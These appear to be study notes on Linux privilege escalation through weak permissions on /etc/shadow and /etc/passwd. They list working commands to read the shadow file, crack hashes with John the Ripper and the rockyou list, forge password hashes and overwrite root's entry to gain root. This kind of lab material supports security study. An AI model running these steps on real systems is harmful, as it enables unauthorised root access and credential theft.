Passswd & shaddow

Weak File Permissions - Readable /etc/shadow

View the contents of the /etc/shadow file

cat /etc/shadow

User's password hash (if they have one) can be found between the first and second colons (:)

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Login as root

su root

Weak File Permissions - Writable /etc/shadow

Generate a new password hash with a password of your choice:

mkpasswd -m sha-512 <new-password-here>

Edit the /etc/shadow file and replace the original root user's password hash with the one you just generated.

Login as root

su root

Weak File Permissions - Writable /etc/passwd

The /etc/passwd file contains information about user accounts. It is world-readable, but usually only writable by the root user. Historically, the /etc/passwd file contained user password hashes, and some versions of Linux will still allow password hashes to be stored there.

Generate a new password hash with a password of your choice

openssl passwd <new-password-here>

Edit the /etc/passwd file and place the generated password hash between the first and second colon (:) of the root user's row (replacing the "x")

Login as root

su root